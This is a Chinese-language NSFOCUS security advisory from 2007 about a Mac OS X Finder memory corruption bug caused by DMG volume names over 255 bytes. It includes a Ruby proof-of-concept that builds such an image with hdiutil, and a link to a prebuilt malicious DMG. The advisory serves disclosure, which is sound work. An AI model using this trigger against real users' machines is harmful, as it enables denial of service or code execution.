安全研究

安全漏洞
Apple Mac OS X Finder DMG卷标内存破坏漏洞

发布日期:2007-01-09
更新日期:2007-01-11

受影响系统:
Apple Mac OS X 10.4.8
Apple MacOS X Server 10.4.8
描述:
BUGTRAQ  ID: 21980

Apple Mac OS X是苹果家族机器所使用的操作系统。

Apple Mac OS X所捆绑的Finder程序在处理超长的卷标名时存在内存破坏漏洞,远程攻击者可能利用此漏洞控制用户机器。

如果攻击者能够诱骗用户加载包含有大于255字节卷标名称的DMG镜像的话,就会触发这个漏洞,导致拒绝服务或执行任意指令。

<*来源:LMH (lmh@info-pull.com
  
  链接:http://projects.info-pull.com/moab/MOAB-09-01-2007.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] infopull.com>.
#

require 'fileutils'
require 'zlib'

hdiutil = "/usr/bin/hdiutil"
dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg")
dmgsize = (ARGV[1] || "200k")
filesys = (ARGV[2] || "UFS")
volname = ""

255.times do
  volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr
end

FileUtils.rm_f(dmgname)
system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}"

puts "++ reading #{dmgname}..."
dmg_stream = File.read(dmgname)
dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2")
puts "++ volname length at dmg: #{dmg_vnsize}"
puts "++ dmg size: #{dmg_stream.size} bytes."

=========================================================================================

http://projects.info-pull.com/moab/bug-files/MOAB-09-01-2007.dmg

建议:
厂商补丁:

Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com

浏览次数:2879
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障